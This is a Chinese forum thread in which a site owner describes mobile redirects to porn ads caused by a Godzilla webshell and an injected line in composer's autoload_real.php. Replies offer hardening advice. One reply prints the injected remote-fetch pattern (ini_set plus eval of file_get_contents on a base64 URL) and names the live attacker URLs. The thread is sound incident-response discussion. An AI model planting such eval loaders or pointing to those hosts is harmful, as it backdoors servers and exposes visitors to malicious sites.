网站遭劫持了，被注入恶意代码，请教各位大佬如何清除并再次预防？

前两天用户反馈移动端网页访问不正常，一查看发现，特定的路由会触发跳转到黄色广告地址。
如：
网址：`https://www.网址.com/edu` 在 pc 端正常访问，但在移动端就会被跳转到其他网站上。
如修改路由为`/edu123`也会跳转，修改为`/ed`则不会。初步判断关键字为`edu`。

### 进行排查：
1. `dns`污染  
网站都是使用了`https`，排除
2. `nginx`  
通过查看日志以及转发记录，发现/edu 被转发到了 php-cgi ，排除  
3. `php`  
在排查时在看见 v2 中有人遇到类似的问题，于是照着大佬的思路排查，结果发现每个站都被添加了一个 pass.php 文件。
根据代码内容搜索，是用[Godzilla]( https://github.com/BeichenDream/Godzilla)生成的木马脚本。对网络安全这个块不太懂，有没有大佬知道怎么切底清除这个脚本带来的影响？

### 初步处理尝试：
清除每个站点下的 pass.php 文件，以及相同时间被创建的一些文件。检查 php.ini 文件以及 so 文件是否被修改。没有发现可疑配置后，重启 php 服务再次访问。
结果还是一样会跳转到其他网站。。。

### 继续排查：
查看 php 慢日志时，发现请求网页时有执行`file_get_contents`函数，于是循着文件路径查看，找到了罪魁祸首，项目`composer`下的`autoload_real.php`被植入了一行代码，删除掉后网址恢复正常。

### 疑问请求：
请问这是利用了 composer 的漏洞吗？ composer 的版本是 2.3.7? 然后被植入 pass.php 的文件是不是宝塔的漏洞导致被上传的？因为我看到这些文件都是 www 宝塔用户上传的。

改密码，或者关闭外网访问后台
不访问的时候关闭 22 端口

我比较菜，装了宝塔自动备份，翻车了直接恢复备份🤣，找人从织梦转到 PbootCMS 然后让搞了几次。后面把管理密码和入口换了就行。

1.先排查 ssh 是否设置了禁止 root 登录，和只用密钥登录
2.下载到本地用第三方杀毒软件排查下是否包含一句话木马

明显是有漏洞，不解决 0day 很难，如果是用开源的程序 那就更新 fersion ，如果用的随便买来的源码 那就自求多福做代码审计。建议做 docker 隔离，不至于一个站点 g 了 其他关联网站全 g 了

看看是不是这个问题，CVE-2024-4577

上 WAF

用虚拟主机

看看这个
t/1056428
t/1060326

直观的看网页跳转的问题是在 composer_real.php 里。
正常的文件里是没有 第一行 ini_set 和 eval()这两个操作的。
ini_set 是把报错关了，然后 eval('?>'.file_get_contents(base64_decode('xxxx'))) 这个是在从远程获取 php 代码，根据你图里的 base64 解了下 地址是这个 http://8.jsc20244.com:81/jsc/529kaiwen.txt ，这个 txt 里放着 php 代码，这段代码最后的操作能看到用 curl 访问了另一个地址( http://529.jsc20244.com:81/502.php)，这个地址放在浏览器里显示 404 ，在 chrome 里用 f12 伪装成移动端浏览器，就会显示页面，“请使用 手机 设备打开”，可能就是你说的移动端跳转的地址。
至于这个 composer_real.php 文件怎么被搞的，就不知道了，列两个可能性：
1.  用户上传的 php 程序中，composer 被植入了 eval()那坨代码。
2.  你服务器被搞了，然后别人在 composer 里植入了恶意代码，比如通过你说的 pass.php 这样的一句话后门